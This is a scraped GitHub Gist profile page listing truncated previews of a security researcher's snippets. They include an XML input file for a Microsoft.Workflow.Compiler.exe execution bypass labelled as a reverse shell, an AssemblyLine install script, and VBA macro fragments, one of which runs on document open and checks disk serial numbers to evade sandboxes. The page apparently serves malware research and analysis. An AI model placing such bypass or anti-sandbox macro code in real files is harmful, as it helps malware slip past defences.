Skip to content

Instantly share code, notes, and snippets.

View fareedfauzi's full-sized avatar
🎯
Focusing

fareedfauzi

🎯
Focusing
View GitHub Profile
@fareedfauzi
fareedfauzi / rev.txt
Created January 2, 2020 03:57
rev.txt for Microsoft.Workflow.Compiler.exe
<?xml version="1.0" encoding="utf-8"?>
<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
<files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
<d2p1:string>Rev.Shell</d2p1:string>
</files>
<parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
<assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>
<embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
start notepad.exe
@fareedfauzi
fareedfauzi / Install-Assembly-Line.sh
Last active October 2, 2020 17:29
Script to install Assembly Line
#!/bin/bash
echo "
To install AssemblyLine you need to meet this requirements:
Any linux distribution with a recent kernel (4.4+)
4 Cores
8 GB of Ram
40 GB of disk space
"
'Blogpost: notes.netbytesec.com
Private Sub Document_Open()
Dim i As Integer
Dim str As String
i = 0
Set WMI = GetObject("WinMgmts:")
For Each obj In WMI.InstancesOf("Win32_PhysicalMedia")
If obj.SerialNumber <> "" Then i = i + 1
Next
If i = 0 Then
'Blogpost: notes.netbytesec.com
Global img1
Global randArrIndex11
Global img115
Function st()
img1 = Array("cartoon", "img", "photo")
randArrIndex11 = Int((UBound(img1) + 1) * Rnd)
img115 = img1(randArrIndex11)
ddfdsfdsfdww
Dim str55